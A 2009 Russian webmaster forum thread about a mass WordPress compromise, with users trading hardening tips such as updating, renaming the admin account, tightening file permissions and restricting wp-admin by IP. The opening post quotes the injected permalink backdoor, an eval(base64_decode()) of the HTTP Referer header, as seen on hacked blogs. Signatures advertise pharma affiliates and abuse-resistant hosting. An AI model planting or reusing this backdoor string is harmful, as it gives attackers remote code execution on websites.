АРМАДА
Очередной масовый хак вордпресса
Новая тема Написать ответ Advanced Hosters - профессиональный хостинг

adamant
V.I.P.
Зарегистрирован: 20.03.2008
Сообщений: 11504
Обратиться по нику
# Добавлено:Сб Сен 05, 2009 2:33 pmДобавить в избранноеОтветить с цитатой
Сегодня вижу вот такю строчечку в ВП в ЧПУ
Код:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/



вот [url=http://www.google.com/search?client=opera&rls=ru&q=%22eval(base64_decode($_SERVER%5BHTTP_REFERER%5D%22&sourceid=opera&ie=utf-8&oe=utf-8]так говорит гугль[/url]
http://www.google.com/search?client=opera&rls=ru&q=%22eval(base64_decode($_SERVER%5BHTTP_REFERER%5D%22&sourceid=opera&ie=utf-8&oe=utf-8

ну и тута пишет Влад
EvaPharmacy. Чтобы мазать хлеб икоркой, Ева – лучшая партнёрка! Инвайты Jabber: [email protected] и ICQ: 750000
Unlimited on 1Gbs port |

IseeDeadPeople
Объединенная Электрическая
Зарегистрирован: 06.12.2005
Сообщений: 18000
Обратиться по нику
# Добавлено:Сб Сен 05, 2009 5:22 pmОтветить с цитатой
а где бы почитать полное тех. описание бага? .. и заплатки взять?
у меня только один ресурс на старой версии ВП, необновлял его ниразу, как узнать подвержен ли он опасности..

вообщем, больше конкретики..
http://m.lsl.com/

Rabbit
Кролики - это не только ценный мех
Зарегистрирован: 01.08.2005
Сообщений: 19788
Star (Сумма: 1)
Обратиться по нику
# Добавлено:Сб Сен 05, 2009 5:39 pmОтветить с цитатой
Цитата:
на старой версии ВП, необновлял его ниразу, как узнать подвержен ли он опасности..

Подвержен, 250%. Обновись и побыстрее.
Новое. Прибыльное. Скоро!

Sterx +
Опытный
Зарегистрирован: 08.10.2007
Сообщений: 252
Обратиться по нику
# Добавлено:Сб Сен 05, 2009 7:46 pmОтветить с цитатой
куй его знает, с тех пор как закрыл админки htaccess меня не ломали вот уже с год-полтора точно
некоторые блоги wp 2.3.1 стоят
аккаунты адалт партнерок за 50%

shhef +
V.I.P.
Зарегистрирован: 14.09.2007
Сообщений: 7371
Обратиться по нику
# Добавлено:Сб Сен 05, 2009 7:51 pmОтветить с цитатой
каникулы закончились, студентам же надо чем то заняться да и коню понятно, что ВП ломают даже школьники...
Лучшее решение для фармы! Smile Все остальные нервно курят в сторонке
Абузоустойчивые VDS и дедики Облачный хостинг + 10 у.е при реге! Лучший треккер!

DK +
wordpress
Зарегистрирован: 18.06.2008
Сообщений: 2425
Обратиться по нику
# Добавлено:Сб Сен 05, 2009 7:57 pmОтветить с цитатой
а нельзя ли просто удалить wp admin?

m_Stasuk
Дизайнер
Зарегистрирован: 23.12.2007
Сообщений: 5967
Contest (Сумма: 2)
Обратиться по нику
# Добавлено:Сб Сен 05, 2009 8:55 pmОтветить с цитатой
Sterx, подскажи как это сделать Smile получишь нереальную репу :mrgreen:
Зарабатываю на рускамзе
Ростов-на-Дону

Sterx +
Опытный
Зарегистрирован: 08.10.2007
Сообщений: 252
Обратиться по нику
# Добавлено:Сб Сен 05, 2009 9:14 pmОтветить с цитатой
смеёсси.
wp-admin папку закройте htaccess'ом и все
аккаунты адалт партнерок за 50%

Dark Elf +
V.I.P.
Зарегистрирован: 23.12.2007
Сообщений: 1545
Обратиться по нику
# Добавлено:Вс Сен 06, 2009 10:43 amОтветить с цитатой
Этот баг подробно описан в августовском номере любимого школьниками журнала "Х". Собственно, это и не баг даже, а возможные действия злодея, после того, как ВП уже сломан и получен доступ к админке. Способы борьбы стандартные

1. Не будем делать юзернейм админа дефолтным (admin или administrator) - эксплойты, которыми пользуются злохакеры в основном ищут именно такого юзера. Чтобы еще больше сбить с толку, можно создать юзера admin с привилегиями простого читателя.
2. Изменить права доступа на все каталоги и все файлы на 644 или даже 444, кроме папки, куда грузятся картинки (777). При этом из админки будет невозможно редактировать темы и менять структуру пермалинков, но ведь и нужно это обычно бывает только один раз при первоначальной установке. Да и при необходимости можно на время поменять обратно.
3. Создать пустой файл index.html в папке plugins
4. Дополнительно можно закрыть админку средствами Апача, поставив пароль на /wp-admin/ через cPannel
5. Если всегда входите в админку с одного IP, допишите в .htaccess в папке /wp-admin/ (если его там нет, то создайте) следующее

order deny,allow
deny from all
allow from 123.456.789.123

Здесь 123.456.789.123 - твой ИП


Подробнее (правда про немного другой баг, но суть та же)
http://darkelfblog.info/?p=34
Мой старый блог про адалт-блоги
Тёмные — это те, кто хочет свободы и независимости, не стремятся к власти, не навязывают своих глупых желаний окружающим.

sydoow
V.I.P.
Зарегистрирован: 29.06.2007
Сообщений: 8215
Обратиться по нику
# Добавлено:Вс Сен 06, 2009 10:58 pmОтветить с цитатой
Опять в "Хакере" темы палят))) помню как тодавно я прочитал там статьлю про адалт и заинтересовался им)))

adamant
V.I.P.
Зарегистрирован: 20.03.2008
Сообщений: 11504
Обратиться по нику
# Добавлено:Вс Сен 06, 2009 11:31 pmОтветить с цитатой
[offtop]аха.. а темерь пришла другая волна ))) ::::: как поиметь халявных ссылок с ломаных вордпресов, ну или трафика..[/offtop]
EvaPharmacy. Чтобы мазать хлеб икоркой, Ева – лучшая партнёрка! Инвайты Jabber: [email protected] и ICQ: 750000
Unlimited on 1Gbs port |

Ffadu
aka Udaff
Зарегистрирован: 04.06.2008
Сообщений: 3266
Contest (Сумма: 1)
Обратиться по нику
# Добавлено:Пн Сен 07, 2009 6:34 amОтветить с цитатой
сел обновлять - блять Sad

wlad2
Свой
Зарегистрирован: 20.03.2009
Сообщений: 16
Обратиться по нику
# Добавлено:Чт Сен 24, 2009 8:26 pmОтветить с цитатой
хорошо что базу не удолили, теперь поставил плагин авто бэкапа на мыло..
Вордпрессовский seo блог wlad2.ru
Новая тема Написать ответ    ГЛАВНАЯ ~ ТЕХНИЧЕСКИЕ ВОПРОСЫ

Перейти:  





Генеральный спонсор



Партнеры